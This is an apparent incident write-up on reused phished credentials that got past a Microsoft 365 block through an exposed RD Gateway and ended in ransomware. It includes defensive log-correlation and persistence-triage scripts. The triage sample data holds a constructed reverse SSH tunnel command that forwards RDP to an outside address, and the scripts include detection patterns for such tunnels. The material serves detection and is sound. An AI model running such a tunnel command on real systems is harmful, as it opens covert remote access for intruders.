Phishing remains one of the most effective initial access techniques used by threat actors today. Many organisations take comfort in the fact that modern email platforms, particularly Microsoft 365, offer strong protections such as multi-factor authentication (MFA), conditional access, and suspicious login detection.
However, a recent incident we investigated highlights a critical point: protecting one entry point does not secure your entire environment.
The Initial Phish and a Partial Success
In this case, a user received a phishing email containing a link to what appeared to be a legitimate login page. The page was designed to harvest credentials, which were successfully captured by the threat actor.
Shortly after, suspicious login attempts were observed against the user’s Microsoft 365 account. These attempts were unsuccessful, as existing conditional access controls prevented the threat actor from authenticating.
At this stage, it would have been easy to assume the organisation had dodged a bullet. However, the successful harvesting of credentials represents a wider risk. Once captured, credentials can be reused or passed to other threat actors.
The Reality: Credentials Were Still Valid
While Microsoft 365 protections performed as intended, the user’s credentials were still valid elsewhere within the organisation’s infrastructure.
The credentials were then used to access the environment via an externally exposed Remote Desktop Gateway (RDG) service. Critically, this service allowed authentication using the compromised username and password without any additional verification.
This activity could indicate a single threat actor progressing through the intrusion. However, it is also consistent with a known pattern where credentials obtained through phishing are shared or sold. In these cases, an initial access broker may obtain valid credentials and pass them to another group specialising in lateral movement, data exfiltration, and ransomware deployment.
This access provided a threat actor with a foothold on the user’s workstation, which had direct access to the organisation’s only server.
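The pattern described above (a Conditional Access block in Microsoft 365 followed by a successful logon with the same credentials through the RD Gateway) is something a SOC can look for directly. The script below is an added example written for this article, not code from the original post or from any vendor tooling. It assumes simplified record shapes: Entra ID sign-in records carrying the AADSTS error code 53003 ("blocked by Conditional Access"), and Windows Microsoft-Windows-TerminalServices-Gateway/Operational event 302 (user connected to a resource). It also assumes the on-premises sAMAccountName matches the UPN prefix; all sample records are constructed.

```python
"""Correlate a Conditional Access block in Microsoft 365 with a later
Remote Desktop Gateway connection by the same account.

Added example, not from the original post. Record shapes are simplified
versions of Entra ID sign-in logs and the TS Gateway operational log;
every sample record below is constructed."""
from datetime import datetime, timedelta

CA_BLOCKED = 53003  # AADSTS53003: sign-in blocked by Conditional Access
RDG_CONNECTED = 302  # TS Gateway operational log: user connected to resource

# Constructed Entra ID sign-in records (not real data).
SIGNINS = [
    {"user": "j.smith@example.com", "time": "2024-03-01T09:12:00",
     "errorCode": CA_BLOCKED, "ip": "198.51.100.7"},
    {"user": "j.smith@example.com", "time": "2024-03-01T09:13:30",
     "errorCode": CA_BLOCKED, "ip": "198.51.100.7"},
    {"user": "a.jones@example.com", "time": "2024-03-01T10:00:00",
     "errorCode": 0, "ip": "203.0.113.5"},
]

# Constructed RD Gateway events (not real data).
RDG_EVENTS = [
    {"eventId": 302, "user": "CORP\\j.smith", "time": "2024-03-01T11:40:00",
     "ip": "198.51.100.7", "resource": "WS-042"},
    {"eventId": 303, "user": "CORP\\j.smith", "time": "2024-03-01T12:10:00",
     "ip": "198.51.100.7", "resource": "WS-042"},  # disconnect, ignored
    {"eventId": 302, "user": "CORP\\a.jones", "time": "2024-03-01T08:00:00",
     "ip": "203.0.113.5", "resource": "WS-011"},  # no prior CA block
]


def account_key(name):
    """Normalise 'j.smith@example.com' and 'CORP\\j.smith' to 'j.smith'.
    Assumes the sAMAccountName equals the UPN prefix (an assumption)."""
    name = name.lower()
    if "@" in name:
        return name.split("@", 1)[0]
    return name.rsplit("\\", 1)[-1]


def find_credential_pivots(signins, rdg_events, window=timedelta(hours=24)):
    """Return RDG connections that follow a CA-blocked cloud sign-in for
    the same account within `window`. Such a pair means the phished
    credentials were accepted on a path without equivalent protections."""
    blocked = {}
    for s in signins:
        if s["errorCode"] == CA_BLOCKED:
            blocked.setdefault(account_key(s["user"]), []).append(s)

    findings = []
    for ev in rdg_events:
        if ev["eventId"] != RDG_CONNECTED:
            continue
        acct = account_key(ev["user"])
        t_rdg = datetime.fromisoformat(ev["time"])
        for s in blocked.get(acct, []):
            t_block = datetime.fromisoformat(s["time"])
            if timedelta(0) <= t_rdg - t_block <= window:
                findings.append({
                    "account": acct,
                    "blocked_at": s["time"],
                    "rdg_connected_at": ev["time"],
                    "resource": ev["resource"],
                    "same_source_ip": s["ip"] == ev["ip"],
                })
                break  # one finding per RDG connection is enough
    return findings


if __name__ == "__main__":
    for f in find_credential_pivots(SIGNINS, RDG_EVENTS):
        print(f)
```

The same-source-IP flag is only a hint: a shared source address strengthens the case for a single actor, while a different address is consistent with the credential-resale pattern the article mentions. Either way the finding is the same: the account's password has already been used by someone who could not pass Conditional Access.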
From Access to Compromise
Once inside the environment, the threat actor proceeded to:
- Deploy credential harvesting tools such as Mimikatz and LaZagne
- Enumerate the network using tools including NetScan
- Compromise privileged accounts
- Establish persistence via scheduled tasks and reverse SSH tunnels
- Exfiltrate data using a cloud synchronisation tool (MEGAsync)
- Deploy ransomware across the environment
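Two of the persistence techniques in the list above, scheduled tasks and reverse SSH tunnels, leave traces in the Windows Security log that can be triaged from a SIEM export. The script below is an added example written for this article, not code from the original post. It assumes event 4698 (scheduled task created, with the task XML in TaskContent) and event 4688 (process creation) with command-line auditing enabled; the events themselves are constructed, and the "user-writable path" heuristic is a simple illustration rather than a complete allow-list.

```python
"""Triage constructed Windows Security events for two persistence
techniques named in the write-up: scheduled task creation (4698) whose
action runs from a user-writable directory, and ssh.exe launched with a
remote (-R) port forward, i.e. a reverse tunnel (4688 with command line).

Added example, not from the original post. Field names follow the
Security log's EventData names; the events are constructed."""
import xml.etree.ElementTree as ET

# Path fragments that an unprivileged user can normally write to.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")
TASK_NS = "http://schemas.microsoft.com/windows/2004/02/mit/task"

# Constructed sample events (reduced to the fields the checks need).
EVENTS = [
    {"EventID": 4698, "SubjectUserName": "j.smith", "TaskName": "\\Updater",
     "TaskContent": (
         f'<Task xmlns="{TASK_NS}"><Actions><Exec>'
         '<Command>C:\\Users\\j.smith\\AppData\\Local\\Temp\\svc.exe</Command>'
         '<Arguments>-q</Arguments></Exec></Actions></Task>')},
    {"EventID": 4698, "SubjectUserName": "SYSTEM",
     "TaskName": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag",
     "TaskContent": (
         f'<Task xmlns="{TASK_NS}"><Actions><Exec>'
         '<Command>%windir%\\system32\\defrag.exe</Command>'
         '</Exec></Actions></Task>')},
    {"EventID": 4688, "SubjectUserName": "j.smith",
     "NewProcessName": "C:\\Windows\\System32\\OpenSSH\\ssh.exe",
     "CommandLine": "ssh.exe -N -R 2222:127.0.0.1:3389 user@203.0.113.9"},
    {"EventID": 4688, "SubjectUserName": "a.jones",
     "NewProcessName": "C:\\Windows\\System32\\OpenSSH\\ssh.exe",
     "CommandLine": "ssh.exe admin@fileserver01"},  # ordinary interactive use
]


def task_commands(task_xml):
    """Extract every <Command> element from a scheduled task definition."""
    root = ET.fromstring(task_xml)
    return [el.text or "" for el in root.iter() if el.tag.endswith("}Command")]


def is_user_writable(path):
    return any(marker in path.lower() for marker in USER_WRITABLE)


def has_reverse_forward(command_line):
    """True if the ssh command line requests a remote forward (-R ...)."""
    return any(tok.startswith("-R") for tok in command_line.split())


def triage(events):
    """Return a list of findings, one per suspicious event."""
    findings = []
    for ev in events:
        if ev["EventID"] == 4698:
            for cmd in task_commands(ev["TaskContent"]):
                if is_user_writable(cmd):
                    findings.append({"technique": "scheduled_task",
                                     "user": ev["SubjectUserName"],
                                     "task": ev["TaskName"], "detail": cmd})
        elif ev["EventID"] == 4688:
            proc = ev["NewProcessName"].lower()
            cmdline = ev.get("CommandLine", "")
            if proc.endswith("\\ssh.exe") and has_reverse_forward(cmdline):
                findings.append({"technique": "reverse_ssh_tunnel",
                                 "user": ev["SubjectUserName"],
                                 "detail": cmdline})
    return findings


if __name__ == "__main__":
    for f in triage(EVENTS):
        print(f)
```

Both checks depend on logging that is off by default: 4698 requires "Audit Other Object Access Events" and 4688 only carries the command line when "Include command line in process creation events" is enabled. Confirming those settings is part of the same holistic review the article argues for.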
What began as a single set of phished credentials ultimately resulted in full network compromise and ransomware deployment.
Key Takeaway: Security Must Be Holistic
This case is a strong reminder that security controls cannot be viewed in isolation.
Yes, Microsoft 365 protection worked. But the threat actor did not need it to fail.
Instead, they pivoted to another access path where the same credentials were accepted without equivalent protections.
Questions Every Organisation Should Be Asking
When reviewing your security posture, it is not enough to ask: “Do we have MFA on email?”
You should also be asking:
- Where else can credentials be used?
- Are all remote access services protected by MFA?
- Do any legacy systems or gateways bypass modern security controls?
- Are authentication standards consistent across the environment?
In this case, the weakest link was not email. It was an alternative access service that relied on the same credentials.